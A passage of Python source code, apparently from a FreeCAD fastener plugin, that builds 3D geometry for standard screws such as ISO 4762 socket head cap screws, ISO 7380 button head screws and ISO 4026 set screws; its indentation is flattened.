PntB2 = Base.Vector(dia / 2.0 - cham_b, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
if a_point <= (k + rtan):
edgeB0 = Part.makeLine(Pnt5, PntB1)
else:
edgeB0 = Part.makeLine(Pnt6, PntB1)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
edgeB1 = Part.Wire([edgeB2, edgeB3])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
if a_point <= (k + rtan):
edgeB0 = Part.makeLine(Pnt5, PntB1)
else:
edgeB0 = Part.makeLine(Pnt6, PntB1)
edgeB1 = Part.makeLine(PntB1, PntB2)
if SType == 'ISO7047': # make raised head rounding
Pnt0 = Base.Vector(0.0, 0.0, ht)
Pnt0arc = Base.Vector(h_arc_x, 0.0, h_arc_z)
edge1 = Part.Arc(Pnt0, Pnt0arc, Pnt1).toShape()
edge2 = Part.makeLine(Pnt1, Pnt2)
PntH0 = Base.Vector(0.0, 0.0, ht + k)
PntH1 = Base.Vector(dk_mean / 2.0, 0.0, ht + k)
recess, recessShell = self.makeCross_H3(cT, mH, ht)
if SType == 'ISO7046':
# ISO7046
Pnt0 = Base.Vector(0.0, 0.0, ht)
edge1 = Part.makeLine(Pnt0, Pnt1) # make flat head
edge2 = Part.makeLine(Pnt1, Pnt2)
recess, recessShell = self.makeCross_H3(cT, mH, ht)
if SType == 'ISO14584': # make raised head rounding with chamfer
Pnt0 = Base.Vector(ePrax / 2.0, 0.0, ht - ePrax / 4.0)
PntCham = Base.Vector(ePrax, 0.0, ht)
PntArc = Base.Vector(h_arc_x, 0.0, h_arc_z)
edge1 = Part.makeLine(Pnt0, PntCham)
edgeArc = Part.Arc(PntCham, PntArc, Pnt1).toShape()
edge2 = Part.makeLine(Pnt1, Pnt2)
edge2 = Part.Wire([edgeArc, edge2])
PntH0 = Base.Vector(ePrax / 2.0, 0.0, ht + k)
PntH1 = Base.Vector(ePrax, 0.0, ht + k)
recess, recessShell = self.makeIso10664_3(tt, t_mean, ht) # hexalobular recess
edge3 = Part.makeLine(Pnt2, Pnt3)
edgeArc = Part.Arc(Pnt3, Pnt4, Pnt5).toShape()
edgeArc1 = Part.makeLine(Pnt3, Pnt4)
edgeArc2 = Part.makeLine(Pnt4, Pnt5)
edge6 = Part.makeLine(Pnt5, Pnt6)
if self.rThread:
# aWire=Part.Wire([edge1,edge2,edge3,edgeArc])
aWire = Part.Wire([edge2, edge3, edgeArc])
else:
if a_point <= (k + rtan):
aWire = Part.Wire([edge2, edge3, edgeArc, edgeB0, edgeB1])
else:
aWire = Part.Wire([edge2, edge3, edgeArc, edge6, edgeB0, edgeB1])
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
headFaces = headShell.Faces
# Part.show(headShell)
if SType == 'ISO7046' or SType == 'ISO14582':
# hCut is just a cylinder for ISO7046
hCut = Part.makeCylinder(dk_mean / 2.0, k, Pnt0)
# Part.show(hCut)
topFace = hCut.Faces[2]
else:
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH0)
edgeH3 = Part.makeLine(PntH0, Pnt0)
hWire = Part.Wire([edge1, edgeH3, edgeH2, edgeH1]) # Cutter for recess-Shell
hWire.reverse() # a fix to work with ver 18
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
topFace = hCut.Faces[0]
recessShell = recessShell.cut(hCut)
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
headFaces.extend(recessShell.Faces)
if SType == 'ISO10642' or SType == 'ISO14582' or SType == 'ASMEB18.3.2':
if self.rThread:
if dia < 3.0 or dia > 5.0:
# if True:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
else:
'''
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False)
rthread.translate(Base.Vector(0.0, 0.0,-a_point-2.0*P))
head = head.fuse(rthread)
head = head.removeSplitter()
cyl = self.cutChamfer(dia, P, l)
#FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
head = head.cut(cyl)
'''
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
cyl = self.cutChamfer(dia, P, l)
screw = screw.cut(cyl)
else:
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
else:
if self.rThread:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
return screw
# make ISO 4762 Allan Screw head
# DIN 7984 Allan Screw head
# ISO 14579 Hexalobular socket head cap screws
def makeIso4762(self, SType='ISO4762', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("der 4762Kopf mit l: " + str(l) + "\n")
# FreeCAD.Console.PrintMessage("the head with iso r: " + str(r) + "\n")
if SType == 'ISO14579':
P, b, dk_max, da, ds_mean, e, lf, k, r, s_mean, t, v, dw, w = FsData["iso4762def"][ThreadType]
tt, A, t = FsData["iso14579def"][ThreadType]
# Head Points 30° countersunk
# Pnt0 = Base.Vector(0.0,0.0,k-A/4.0) #Center Point for countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - A / 8.0) # Center Point for flat countersunk
PntFlat = Base.Vector(A / 8.0, 0.0, k - A / 8.0) # End of flat part
Pnt1 = Base.Vector(A / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
# Here is the next approach to shorten the head building time
# Make two helper points to create a cutting tool for the
# recess and recess shell.
PntH1 = Base.Vector(A / 1.99, 0.0, 2.0 * k)
elif SType == 'DIN7984':
P, b, dk_max, da, ds_min, e, k, r, s_mean, t, v, dw = FsData["din7984def"][ThreadType]
e_cham = 2.0 * s_mean / math.sqrt(3.0)
# Head Points 45° countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - e_cham / 1.99 / 2.0) # Center Point for countersunk
PntFlat = Base.Vector(e_cham / 1.99 / 2.0, 0.0, k - e_cham / 1.99 / 2.0) # End of flat part
Pnt1 = Base.Vector(e_cham / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
PntH1 = Base.Vector(e_cham / 1.99, 0.0, 2.0 * k)
elif SType == 'DIN6912':
P, b, dk_max, da, ds_min, e, k, r, s_mean, t, t2, v, dw = FsData["din6912def"][ThreadType]
e_cham = 2.0 * s_mean / math.sqrt(3.0)
# Head Points 45° countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - e_cham / 1.99 / 2.0) # Center Point for countersunk
PntFlat = Base.Vector(e_cham / 1.99 / 2.0, 0.0, k - e_cham / 1.99 / 2.0) # End of flat part
Pnt1 = Base.Vector(e_cham / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
PntH1 = Base.Vector(e_cham / 1.99, 0.0, 2.0 * k)
elif SType == 'ISO4762' or SType == 'ASMEB18.3.1A':
if SType == 'ISO4762':
P, b, dk_max, da, ds_mean, e, lf, k, r, s_mean, t, v, dw, w = FsData["iso4762def"][ThreadType]
if SType == 'ASMEB18.3.1A':
P, b, dk_max, k, r, s_mean, t, v, dw = FsData["asmeb18.3.1adef"][ThreadType]
e_cham = 2.0 * s_mean / math.sqrt(3.0)
# Head Points 45° countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - e_cham / 1.99 / 2.0) # Center Point for countersunk
PntFlat = Base.Vector(e_cham / 1.99 / 2.0, 0.0, k - e_cham / 1.99 / 2.0) # End of flat part
Pnt1 = Base.Vector(e_cham / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edge1 = Part.Wire([edgeCham0, edgeCham1])
PntH1 = Base.Vector(e_cham / 1.99, 0.0, 2.0 * k)
PntH2 = Base.Vector(0.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, Pnt0)
hWire = Part.Wire([edge1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
'''
PntH2 = Base.Vector(A/8.0,0.0, 2.0*k)
edgeH1 = Part.makeLine(Pnt1,PntH1)
edgeH2 = Part.makeLine(PntH1,PntH2)
edgeH3 = Part.makeLine(PntH2,PntFlat)
hWire = Part.Wire([edgeCham1,edgeH1,edgeH2,edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0,0.0,0.0),Base.Vector(0.0,0.0,1.0),360)
#Part.show(hWire)
'''
sqrt2_ = 1.0 / math.sqrt(2.0)
# depth = s_mean / 3.0
'''
if (b > l - 2*P):
bmax = l-2*P
else:
bmax = b
halfturns = round(2.0*(bmax+P)/P) # number of thread turns
if self.RealThread.isChecked():
a_real = l-(halfturns+2)*P/2.0 # point to fuse real thread
else:
a_real = l-halfturns*P/2.0 # starting point of thread
if a_real < r:
a_point = r*1.3
else:
a_point = a_real
'''
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
### make the new code with math.modf(l)
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a_point
# FreeCAD.Console.PrintMessage("The transition at a: " + str(a) + " turns " + str(turns) + "\n")
# rad30 = math.radians(30.0)
# Head Points
Pnt2 = Base.Vector(dk_max / 2.0 - v, 0.0, k) # start of fillet
Pnt3 = Base.Vector(dk_max / 2.0 - v + v * sqrt2_, 0.0, k - v + v * sqrt2_) # arc-point of fillet
Pnt4 = Base.Vector(dk_max / 2.0, 0.0, k - v) # end of fillet
Pnt5 = Base.Vector(dk_max / 2.0, 0.0, (dk_max - dw) / 2.0) # we have a chamfer here
Pnt6 = Base.Vector(dw / 2.0, 0.0, 0.0) # end of chamfer
Pnt7 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt8 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt9 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt10 = Base.Vector(dia / 2.0, 0.0, -a_point) # start of thread
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.Arc(Pnt7, Pnt8, Pnt9).toShape()
'''
# bolt points
PntB1 = Base.Vector(dia/2.0,0.0,-l-P) # Chamfer is made with a cut later
PntB2 = Base.Vector(0.0,0.0,-l-P)
#PntB3 = Base.Vector(0.0,0.0,-l)
edgeB0 = Part.makeLine(Pnt10,PntB1)
edgeB1 = Part.makeLine(PntB1,PntB2)
#edgeB2 = Part.makeLine(PntB2,PntB3)
edgeZ0 = Part.makeLine(PntB2,Pnt0)
aWire=Part.Wire([edge1,edge2,edge3,edge4,edge5,edge6,edge7,edge8, \
edgeB0, edgeB1, edgeZ0])
'''
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7])
else:
# bolt points
cham_t = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_t)
PntB2 = Base.Vector(dia / 2.0 - cham_t, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
# edgeB1 = Part.makeLine(Pnt10,PntB1)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
if a_point <= (r + 0.0001):
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7, \
edgeB1, edgeB2, edgeB3])
else:
edge8 = Part.makeLine(Pnt9, Pnt10)
edgeB1 = Part.makeLine(Pnt10, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7, edge8, \
edgeB1, edgeB2, edgeB3])
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# head = Part.Solid(headShell)
# Part.show(aWire)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
headFaces = headShell.Faces
# Hex cutout
if SType == 'ISO14579':
# recess = self.makeIso10664(tt, t, k) # hexalobular recess
recess, recessShell = self.makeIso10664_3(tt, t, k) # hexalobular recess
elif SType == 'DIN6912':
recess, recessShell = self.makeAllen2(s_mean, t, k, t2) # hex with center
else:
recess, recessShell = self.makeAllen2(s_mean, t, k)
recessShell = recessShell.cut(hCut)
topFace = hCut.Faces[1]
# topFace = hCut.Faces[0]
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
# headFaces.append(hCut.Faces[2])
# allenscrew = head.cut(recess)
# Part.show(hCut)
headFaces.extend(recessShell.Faces)
# if self.RealThread.isChecked():
if self.rThread:
# if (dia < 3.0) or (dia > 5.0):
if True:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# Part.show(rthread)
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
allenscrew = Part.Solid(headShell)
else:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
allenscrew = Part.Solid(headShell)
cyl = self.cutChamfer(dia, P, l)
# FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
allenscrew = allenscrew.cut(cyl)
else:
headShell = Part.Shell(headFaces)
allenscrew = Part.Solid(headShell)
return allenscrew
# make ISO 7379 Hexagon socket head shoulder screw
def makeIso7379(self, SType='ISO7379', ThreadType='M6', l=16):
if SType == 'ISO7379':
P, d1, d3, l2, l3, SW = FsData["iso7379def"][ThreadType]
if SType == 'ASMEB18.3.4':
P, d1, d3, l2, l3, SW = FsData["asmeb18.3.4def"][ThreadType]
d2 = self.getDia(ThreadType, False)
l1 = l
# define the fastener head and shoulder
# applicable for both threaded and unthreaded versions
point1 = Base.Vector(0, 0, l1 + l3)
point2 = Base.Vector(d3 / 2 - 0.04 * d3, 0, l3 + l1)
point3 = Base.Vector(d3 / 2, 0, l3 - 0.04 * d3 + l1)
point4 = Base.Vector(d3 / 2, 0, l1)
point5 = Base.Vector(d1 / 2, 0, l1)
point6 = Base.Vector(d1 / 2 - 0.04 * d1, 0, l1 - 0.1 * l3)
point7 = Base.Vector(d1 / 2, 0, l1 - 0.2 * l3)
point8 = Base.Vector(d1 / 2, 0, 0)
point9 = Base.Vector(d2 / 2, 0, 0)
edge1 = Part.makeLine(point1, point2)
edge2 = Part.makeLine(point2, point3)
edge3 = Part.makeLine(point3, point4)
edge4 = Part.makeLine(point4, point5)
edge5 = Part.Arc(point5, point6, point7).toShape()
edge6 = Part.makeLine(point7, point8)
edge7 = Part.makeLine(point8, point9)
top_face_profile = Part.Wire([edge1])
top_face = top_face_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
head_shoulder_profile = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7])
if not self.rThread:
# if a modelled thread is not desired:
# add a cylindrical section to represent the threads
point10 = Base.Vector(d2 / 2 - 0.075 * d2, 0, -0.075 * l2)
point11 = Base.Vector(d2 / 2, 0, -0.15 * l2)
point12 = Base.Vector(d2 / 2, 0, -1 * l2 + 0.1 * d2)
point13 = Base.Vector(d2 / 2 - 0.1 * d2, 0, -1 * l2)
point14 = Base.Vector(0, 0, -1 * l2)
edge8 = Part.Arc(point9, point10, point11).toShape()
edge9 = Part.makeLine(point11, point12)
edge10 = Part.makeLine(point12, point13)
edge11 = Part.makeLine(point13, point14)
# append the wire with the added section
p_profile = Part.Wire([head_shoulder_profile, edge8, edge9, edge10, edge11])
# revolve the profile into a shell object
p_shell = p_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
else:
# if we need a modelled thread:
# the revolved profile is only the head and shoulder
p_profile = head_shoulder_profile
p_shell = p_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
# calculate the number of thread half turns
residue, turns = math.modf((l2) / P)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 1
# make the threaded section
shell_thread = self.makeShellthread(d2, P, halfturns, True, 0)
shell_thread.translate(Base.Vector(0, 0, -2 * P))
# combine the top & threaded section
p_faces = p_shell.Faces
p_faces.extend(shell_thread.Faces)
p_shell = Part.Shell(p_faces)
# make a hole for a hex key in the head
hex_solid, hex_shell = self.makeAllen2(SW, l3 * 0.4, l3 + l1)
top_face = top_face.cut(hex_solid)
p_faces = p_shell.Faces
p_faces.extend(top_face.Faces)
hex_shell.translate(Base.Vector(0, 0, -1))
p_faces.extend(hex_shell.Faces)
p_shell = Part.Shell(p_faces)
screw = Part.Solid(p_shell)
# chamfer the hex recess
cham_p1 = Base.Vector(0, 0, l3 + l1)
cham_p2 = Base.Vector(SW / math.sqrt(3), 0, l3 + l1)
cham_p3 = Base.Vector(0, 0, l3 + l1 - SW / math.sqrt(3)) # 45 degree chamfer
cham_e1 = Part.makeLine(cham_p1, cham_p2)
cham_e2 = Part.makeLine(cham_p2, cham_p3)
cham_profile = Part.Wire([cham_e1, cham_e2])
cham_shell = cham_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
cham_solid = Part.Solid(cham_shell)
screw = screw.cut(cham_solid)
return screw
# make ISO 7380-1 Button head Screw
# make ISO 7380-2 Button head Screw with collar
# make DIN 967 cross recessed pan head Screw with collar
def makeIso7380(self, SType='ISO7380-1', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
# todo: different radii for screws with thread to head or with shaft?
sqrt2_ = 1.0 / math.sqrt(2.0)
if SType == 'DIN967':
P, b, c, da, dk, r, k, rf, x, cT, mH, mZ = FsData["din967def"][ThreadType]
rH = rf # radius of button arc
alpha = math.acos((rf - k + c) / rf)
# Head Points
Pnt0 = Base.Vector(0.0, 0.0, k)
PntArc = Base.Vector(rf * math.sin(alpha / 2.0), 0.0,
k - rf + rf * math.cos(alpha / 2.0)) # arc-point of button
Pnt1 = Base.Vector(rf * math.sin(alpha), 0.0, c) # end of button arc
PntC0 = Base.Vector((dk) / 2.0, 0.0, c) # collar points
PntC2 = Base.Vector((dk) / 2.0, 0.0, 0.0) # collar points
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
edge1 = Part.Arc(Pnt0, PntArc, Pnt1).toShape()
edgeC0 = Part.makeLine(Pnt1, PntC0)
edgeC1 = Part.makeLine(PntC0, PntC2)
edge2 = Part.Wire([edgeC0, edgeC1])
edge3 = Part.makeLine(PntC2, Pnt4)
# Points for recessShell cutter
PntH0 = Base.Vector(0.0, 0.0, 2.0 * k)
PntH1 = Base.Vector(rf * math.sin(alpha), 0.0, 2.0 * k)
recess, recessShell = self.makeCross_H3(cT, mH, k)
else:
if SType == 'ISO7380-1':
P, b, a, da, dk, dk_mean, s_mean, t_min, r, k, e, w = FsData["iso7380def"][ThreadType]
# Bottom of recess
e_cham = 2.0 * s_mean / math.sqrt(3.0) / 0.99
# depth = s_mean / 3.0
ak = -(4 * k ** 2 + e_cham ** 2 - dk ** 2) / (8 * k) # helper value for button arc
rH = math.sqrt((dk / 2.0) ** 2 + ak ** 2) # radius of button arc
alpha = (math.atan(2 * (k + ak) / e_cham) + math.atan((2 * ak) / dk)) / 2
Pnt2 = Base.Vector(rH * math.cos(alpha), 0.0, -ak + rH * math.sin(alpha)) # arc-point of button
Pnt3 = Base.Vector(dk / 2.0, 0.0, 0.0) # end of fillet
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
edge3 = Part.makeLine(Pnt3, Pnt4)
if SType == 'ASMEB18.3.3A':
P, b, da, dk, s_mean, t_min, r, k = FsData["asmeb18.3.3adef"][ThreadType]
# Bottom of recess
e_cham = 2.0 * s_mean / math.sqrt(3.0) / 0.99
# depth = s_mean / 3.0
ak = -(4 * k ** 2 + e_cham ** 2 - dk ** 2) / (8 * k) # helper value for button arc
rH = math.sqrt((dk / 2.0) ** 2 + ak ** 2) # radius of button arc
alpha = (math.atan(2 * (k + ak) / e_cham) + math.atan((2 * ak) / dk)) / 2
Pnt2 = Base.Vector(rH * math.cos(alpha), 0.0, -ak + rH * math.sin(alpha)) # arc-point of button
Pnt3 = Base.Vector(dk / 2.0, 0.0, 0.0) # end of fillet
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
edge3 = Part.makeLine(Pnt3, Pnt4)
if SType == 'ISO7380-2' or SType == 'ASMEB18.3.3B':
if SType == 'ISO7380-2':
P, b, c, da, dk, dk_c, s_mean, t_min, r, k, e, w = FsData["iso7380_2def"][ThreadType]
if SType == 'ASMEB18.3.3B':
P, b, c, dk, dk_c, s_mean, t_min, r, k = FsData["asmeb18.3.3bdef"][ThreadType]
# Bottom of recess
e_cham = 2.0 * s_mean / math.sqrt(3.0) / 0.99
# depth = s_mean / 3.0
ak = -(4 * (k - c) ** 2 + e_cham ** 2 - dk ** 2) / (8 * (k - c)) # helper value for button arc
rH = math.sqrt((dk / 2.0) ** 2 + ak ** 2) # radius of button arc
alpha = (math.atan(2 * (k - c + ak) / e_cham) + math.atan((2 * ak) / dk)) / 2
Pnt2 = Base.Vector(rH * math.cos(alpha), 0.0, c - ak + rH * math.sin(alpha)) # arc-point of button
Pnt3 = Base.Vector(dk / 2.0, 0.0, c) # end of fillet
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
PntC0 = Base.Vector((dk_c - c) / 2.0, 0.0, c) # collar points
PntC1 = Base.Vector(dk_c / 2.0, 0.0, c / 2.0) # collar points
PntC2 = Base.Vector((dk_c - c) / 2.0, 0.0, 0.0) # collar points
edgeC0 = Part.makeLine(Pnt3, PntC0)
edgeC1 = Part.Arc(PntC0, PntC1, PntC2).toShape()
edge3 = Part.makeLine(PntC2, Pnt4)
edge3 = Part.Wire([edgeC0, edgeC1, edge3])
# Head Points
Pnt0 = Base.Vector(e_cham / 4.0, 0.0, k - e_cham / 4.0) # Center Point for chamfer
Pnt1 = Base.Vector(e_cham / 2.0, 0.0, k) # inner chamfer edge at head
# Points for recessShell cutter
PntH0 = Base.Vector(e_cham / 4.0, 0.0, 2.0 * k)
PntH1 = Base.Vector(e_cham / 2.0, 0.0, 2.0 * k)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.Arc(Pnt1, Pnt2, Pnt3).toShape()
recess, recessShell = self.makeAllen2(s_mean, t_min, k)
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
### make the new code with math.modf(l)
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
offSet = r - a_point
Pnt5 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt6 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt7 = Base.Vector(dia / 2.0, 0.0, -a_point) # start of thread
edge4 = Part.Arc(Pnt4, Pnt5, Pnt6).toShape()
edge5 = Part.makeLine(Pnt6, Pnt7)
if SType == 'DIN967':
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
else:
# bolt points
cham_b = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_b)
PntB2 = Base.Vector(dia / 2.0 - cham_b, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
edgeB2 = Part.Wire([edgeB2, edgeB3])
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4])
else:
if a_point <= r:
edgeB1 = Part.makeLine(Pnt6, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edgeB1, edgeB2])
else:
edge5 = Part.makeLine(Pnt6, Pnt7)
edgeB1 = Part.makeLine(Pnt7, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edgeB1, edgeB2])
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(headShell)
headFaces = headShell.Faces
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH0)
edgeH3 = Part.makeLine(PntH0, Pnt0)
hWire = Part.Wire([edge1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
topFace = hCut.Faces[0]
recessShell = recessShell.cut(hCut)
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
headFaces.extend(recessShell.Faces)
if self.rThread:
# if (dia < 3.0) or (dia > 5.0):
if True:
if SType == 'DIN967':
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
else:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
else:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
cyl = self.cutChamfer(dia, P, l)
screw = screw.cut(cyl)
else:
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
return screw
# make ISO 4026 Hexagon socket set screws with flat point
def makeIso4026(self, SType='ISO4026', Threadtype='M6', l=16):
if SType == 'ISO4026' or SType == 'ISO4027' or SType == 'ISO4029':
P, t, dp, dt, df, s = FsData["iso4026def"][Threadtype]
elif SType == 'ISO4028':
P, t, dp, df, z, s = FsData["iso4028def"][Threadtype]
elif SType[:-1] == 'ASMEB18.3.5':
P, t, dp, dt, df, s, z = FsData["asmeb18.3.5def"][Threadtype]
d = self.getDia(Threadtype, False)
d = d * 1.01
# generate the profile of the set-screw
if SType == 'ISO4026' or SType == 'ASMEB18.3.5A':
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dp) / 2))
p4 = Base.Vector(dp / 2, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e2, e3, e4, e5])
elif SType == 'ISO4027' or SType == 'ASMEB18.3.5B':
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dt) / 2))
